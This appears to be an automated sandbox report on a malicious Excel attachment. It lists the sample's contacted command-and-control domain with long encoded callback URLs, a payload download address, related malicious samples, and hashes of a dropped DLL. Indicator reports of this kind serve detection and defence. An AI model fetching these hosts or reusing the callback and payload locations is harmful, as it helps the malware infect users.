http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe
https://api.cortana.ai	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
urbandancecity.com	192.185.16.102	true	false	0%, Virustotal, Browse	unknown
api10.laptok.at	35.228.31.40	true	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/quWyI8WCkgN/SXUvWGfiUm7T0f/lzSlHf7sO503xATuzHkPG/Uh6KISBL5d4ngtXF/8CCWBl9aRux0ggg/WjpeRnlHlxQpgYHWF7/SRgr07KRV/r5lQqK3B6jZkHZiIL4cT/yujdqTpvuL8V1NlvglB/sTzNC3Gtg_2Bwr4uzl4_2F/AC089ktgtaMkN/4Kgt2RLr/Ke14XkQchJOlvOHrYVkVyXU/P0CMvsMir5/NwrpznNArerCa8bkI/55ua2Ge0fpbQ/9kzo82khbwL/WEPiqQPRb97B8a/81xN3oY2Fv8ECPICx_2Be/nWcE6nEvng8OxAW2/XsEKKCKa1AcTuvo/k	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://login.microsoftonline.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://shell.suite.office.com:1443	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://autodiscover-s.outlook.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://cdn.entity.	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://wus2-000.contentsync.	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://powerlift.acompli.net	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://cortana.ai	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://api.aadrm.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://api.microsoftstream.com/api/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://cr.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://ecs.office.com/config/v2/Office	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://graph.ppe.windows.net	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://officeci.azurewebsites.net/api/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://store.office.cn/addinstemplate	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
http://139.162.190.91/campo/a/a.D	sheet9.bin	false	Avira URL Cloud: safe	unknown
https://globaldisco.crm.dynamics.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://store.officeppe.com/addinstemplate	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://web.microsoftstream.com/video/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://graph.windows.net	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://dataservice.o365filtering.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
http://majorleave.net	2200[1].dll.0.dr	false	Avira URL Cloud: safe	unknown
https://prod-global-autodetect.acompli.net/autodetect	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
http://weather.service.msn.com/data.aspx	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://apis.live.net/v5.0/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://management.azure.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://incidents.diagnostics.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://api.office.net	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://incidents.diagnosticssdf.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://entitlement.diagnostics.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://outlook.office.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://templatelogging.office.com/client/log	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://outlook.office365.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://webshell.suite.office.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://management.azure.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://ncus-000.contentsync.	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows.net/common/oauth2/authorize	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://devnull.onenote.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://messaging.office.com/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://augloop.office.com/v2	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://skyapi.live.net/Activity/	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high
https://dataservice.o365filtering.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	8F740160-CB42-41BF-ADD2-59ED776F89FF.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
35.228.31.40	unknown	United States	15169	GOOGLEUS	true
139.162.190.91	unknown	Netherlands	63949	LINODE-APLinodeLLCUS	false
192.185.16.102	unknown	United States	46606	UNIFIEDLAYER-AS-1US	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	350713
Start date:	09.02.2021
Start time:	18:40:43
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Attached_File_898318.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSB@6/10@4/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 24% (good quality ratio 23.3%) Quality average: 80.1% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 71% Number of executed functions: 37 Number of non-executed functions: 44
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.64.90.137, 40.88.32.150, 52.109.88.177, 104.42.151.234, 52.109.76.33, 52.109.12.22, 52.109.12.24, 51.11.168.160, 13.88.21.125, 92.122.213.194, 92.122.213.247, 2.20.142.210, 2.20.142.209, 51.103.5.186, 52.155.217.156, 20.54.26.129, 51.104.144.132, 184.30.24.56, 88.221.62.148 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api10.laptok.at	Presentation_68192.xlsb	Get hash	malicious	Browse	47.89.250.152
	sup11_dump.dll	Get hash	malicious	Browse	45.138.24.6
	out.dll	Get hash	malicious	Browse	45.138.24.6
	crypt_3300.dll	Get hash	malicious	Browse	45.138.24.6
	SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll	Get hash	malicious	Browse	45.138.24.6
	3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	Get hash	malicious	Browse	47.241.19.44
	0HsPbXmcFf1k.vbs	Get hash	malicious	Browse	47.241.19.44
	0LC6H9UPa7cv.vbs	Get hash	malicious	Browse	47.241.19.44
	0AQ7y0jQVHeA.vbs	Get hash	malicious	Browse	47.241.19.44
	3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs	Get hash	malicious	Browse	47.241.19.44
	5Dk2HB4IS3dn.vbs	Get hash	malicious	Browse	47.241.19.44
	JFCp0yRoUS1z.vbs	Get hash	malicious	Browse	47.241.19.44
	kj3D6ZRVe22Y.vbs	Get hash	malicious	Browse	47.241.19.44
	onerous.tar.dll	Get hash	malicious	Browse	47.241.19.44
	0xyZ4rY0opA2.vbs	Get hash	malicious	Browse	47.241.19.44
	6Xt3u55v5dAj.vbs	Get hash	malicious	Browse	47.241.19.44
	JeSoTz0An7tn.vbs	Get hash	malicious	Browse	47.241.19.44
	1qdMIsgkbwxA.vbs	Get hash	malicious	Browse	47.241.19.44
	2Q4tLHa5wbO1.vbs	Get hash	malicious	Browse	47.241.19.44
	0wDeH3QW0mRu.vbs	Get hash	malicious	Browse	47.241.19.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	v1K1JNtCgt.exe	Get hash	malicious	Browse	96.126.109.101
	Order 8953-PDF.exe	Get hash	malicious	Browse	45.118.132.153
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	69.164.207.140
	SecuriteInfo.com.Trojan.Dridex.735.19015.dll	Get hash	malicious	Browse	69.164.207.140
	57JXmQhiof.exe	Get hash	malicious	Browse	45.79.142.211
	MPg2bmWL2M.exe	Get hash	malicious	Browse	45.79.142.211
	PO-3170012466.exe	Get hash	malicious	Browse	96.126.123.244
	Rf1jy0FVcu.exe	Get hash	malicious	Browse	176.58.123.25
	wl0mBiXkW1.exe	Get hash	malicious	Browse	85.159.214.61
	hFsSNJ3Bvz.exe	Get hash	malicious	Browse	45.79.142.211
	PFxtDfOJtu.exe	Get hash	malicious	Browse	45.79.142.211
	MHIOfpMMs9.exe	Get hash	malicious	Browse	45.79.142.211
	RJVPg3z2Pu.exe	Get hash	malicious	Browse	45.79.142.211
	opgVccK0a8.exe	Get hash	malicious	Browse	45.79.142.211
	4Sl5ivG70m.exe	Get hash	malicious	Browse	45.33.89.196
	Attach-1851392551-HN2104490797.xls	Get hash	malicious	Browse	45.79.142.211
	Attach-1608315908-HN886976831.xls	Get hash	malicious	Browse	45.79.142.211
	PURCHASE ORDER.exe	Get hash	malicious	Browse	139.162.21.249
	ST33MQz3ZZ47fFjr8g09.exe	Get hash	malicious	Browse	178.79.168.215
	ST33MQz3ZZ47fFjr8g09.exe	Get hash	malicious	Browse	178.79.168.215
GOOGLEUS	5ncC1M3Cch.exe	Get hash	malicious	Browse	74.125.203.99
	BsjoR9T7ul.apk	Get hash	malicious	Browse	216.58.207.163
	5DktGbEvIA.apk	Get hash	malicious	Browse	172.217.20.238
	5DktGbEvIA.apk	Get hash	malicious	Browse	172.217.20.238
	packing list.pdf.exe	Get hash	malicious	Browse	34.102.136.180
	mal.apk	Get hash	malicious	Browse	216.239.35.0
	RFQ - ASTROFREIGHT FEB21-0621pdf.exe	Get hash	malicious	Browse	34.102.136.180
	LIFE BOAT WIRE FALLS.xlsx	Get hash	malicious	Browse	34.102.136.180
	SecuriteInfo.com.Generic.mg.f7b0e629e591f372.exe	Get hash	malicious	Browse	34.102.136.180
	SOA - NCL INTER LOGISTICS.ppt	Get hash	malicious	Browse	172.217.23.33
	ABN RM753.xlsx	Get hash	malicious	Browse	34.102.136.180
	PO 2420208 .pdf.exe	Get hash	malicious	Browse	34.102.136.180
	dhl.apk	Get hash	malicious	Browse	172.217.20.238
	Order 8953-PDF.exe	Get hash	malicious	Browse	34.102.136.180
	PURCHASE ORDER.xlsx	Get hash	malicious	Browse	34.102.136.180
	PROFOMA INVOICE pdf.exe	Get hash	malicious	Browse	34.102.136.180
	jFLKa34zZb.exe	Get hash	malicious	Browse	34.102.136.180
	VgO6Tbd7Rx.exe	Get hash	malicious	Browse	34.102.136.180
	nw6o9XFk5F.apk	Get hash	malicious	Browse	216.239.35.4
	1. Trace Together v2.5.2 (07 Dec).apk	Get hash	malicious	Browse	172.217.20.227
UNIFIEDLAYER-AS-1US	Claim-9696823-02092021.xls	Get hash	malicious	Browse	192.185.112.213
	Claim-9696823-02092021.xls	Get hash	malicious	Browse	192.185.112.213
	Claim-292671392-02082021.xls	Get hash	malicious	Browse	192.185.16.95
	Claim-292671392-02082021.xls	Get hash	malicious	Browse	192.185.16.95
	DYTh8qC0IAZAWUc.exe	Get hash	malicious	Browse	108.179.232.42
	Tuesday, February 9th, 2021 83422 a.m., 20210209083422.7B8380338EC1D61B@sophiajoyas.cl.html	Get hash	malicious	Browse	50.87.150.0
	vG4U0RKFY2.exe	Get hash	malicious	Browse	162.241.218.118
	Claim-688493464-02082021.xls	Get hash	malicious	Browse	192.185.16.95
	Claim-688493464-02082021.xls	Get hash	malicious	Browse	192.185.16.95
	index_2021-02-08-19_41.dll	Get hash	malicious	Browse	198.57.200.100
	SecuriteInfo.com.Trojan.Dridex.735.19015.dll	Get hash	malicious	Browse	198.57.200.100
	P012108.htm	Get hash	malicious	Browse	216.172.167.66
	RFQ#100027386.exe	Get hash	malicious	Browse	108.167.172.191
	Friday_ February 5th_ 2021 64427 a.m._ 20210205064427.64791275BD060468@juidine.com.html	Get hash	malicious	Browse	50.87.150.0
	sdsadasdf.xls	Get hash	malicious	Browse	192.185.93.238
	sdsadasdf.xls	Get hash	malicious	Browse	192.185.93.238
	Purchase price POP.xlsx	Get hash	malicious	Browse	50.87.144.106
	Thursday, February 4th, 2021 103440 p.m., 20210204223440.464D4D4AD1BFDE50@juidine.com.html	Get hash	malicious	Browse	50.87.150.0
	TSLiIABK75.exe	Get hash	malicious	Browse	162.241.217.171
	gc79a7rUNV.exe	Get hash	malicious	Browse	192.185.20.95

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	CustomerComplaint.exe	Get hash	malicious	Browse	192.185.16.102
	necessary (50).xls	Get hash	malicious	Browse	192.185.16.102
	ct.dll	Get hash	malicious	Browse	192.185.16.102
	LawyerComplaintReport.exe	Get hash	malicious	Browse	192.185.16.102
	CompensationClaim-46373845-02032021.xls	Get hash	malicious	Browse	192.185.16.102
	February Payroll.xls.htm	Get hash	malicious	Browse	192.185.16.102
	RFQ 20RFQ00106 - ID N#U00b0. 04129.exe	Get hash	malicious	Browse	192.185.16.102
	RFQ 20RFQ00106 - ID N#U00c2#U00b0. 04129.exe	Get hash	malicious	Browse	192.185.16.102
	contract (48).xls	Get hash	malicious	Browse	192.185.16.102
	SP AIR B00,pdf.exe	Get hash	malicious	Browse	192.185.16.102
	DHL_119040 nyugtabizonylat,pdf.exe	Get hash	malicious	Browse	192.185.16.102
	answer (36).xls	Get hash	malicious	Browse	192.185.16.102
	Specifications.xlsx	Get hash	malicious	Browse	192.185.16.102
	REVISED_EPDA _ Statment & Tuticorin MV GRACE.exe	Get hash	malicious	Browse	192.185.16.102
	QuDjMtiFx0.exe	Get hash	malicious	Browse	192.185.16.102
	255423.jhertlein.255423.htm	Get hash	malicious	Browse	192.185.16.102
	yqwit.exe	Get hash	malicious	Browse	192.185.16.102
	mq5QuYgwNX.dll	Get hash	malicious	Browse	192.185.16.102
	DHL_119040 documento de recibo,pdf.exe	Get hash	malicious	Browse	192.185.16.102
	P012108.htm	Get hash	malicious	Browse	192.185.16.102

Dropped Files

No context

Created / dropped Files

C:\ProgramData\ddg\11.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	292864
Entropy (8bit):	6.716033334198825
Encrypted:	false
SSDEEP:	3072:7m3Ztpl9Lpeyx09/34JOs7npgMJTVyMKN71TzjmDExUQQsP9+izoQiQ8QWQtQuQc:6pR+cTnylZPjmJQQsVj/Tmcss+l/
MD5:	B6F4155A945D241F4E5228571C2AB39C
SHA1:	2F4C7FD261CCFE3C4E3DE686A056251035DE489E
SHA-256:	CE7F1D11DD7BEC82B96DC9472AB1D36CBA5E1C99F0480DBA6DD60CD3090DE320
SHA-512:	5E973F8C2168CBFB3C476703FAD6C5F2E90E65C39C7CB6828F759437BDE42A1718EEC9F1BC53874326D14C4F778FCE7FA30A48065B2E36618A202921CDA98642
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.f...f...f...4..f...4..f...4.f.......f...f...f.....f......f...4..f......f..Rich.f..........................PE..L.....T...........!........J...............@...............................p............@.........................PA..C....A..<....@..T....................P..x...pA..8..............................@............@..$............................text...(......................... ..`.rdata.......@......................@..@.data...@....P.......8..............@....rsrc...T....@.......R..............@..@.reloc..x....P... ...X..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D28724D9-6B49-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	21592
Entropy (8bit):	1.7491965235907891
Encrypted:	false
SSDEEP:	48:IwJhGcpr+GwpL6G/ap8AcrGIpcmLAGvnZpvmJWGouuRqp9meGo4SuMVu1pmmuGWz:rJXZ2Zg2Ac9WaZtAyAfiFMo1MVkoP
MD5:	B0E851D33A85E070D007195391C2B6C5
SHA1:	F689A186486EAE7A083F1AE20FEE7767C3365F8D
SHA-256:	559660D69D5A3ADEEE51476F9593B0D87B067953461A095DB492962D6D0BE876
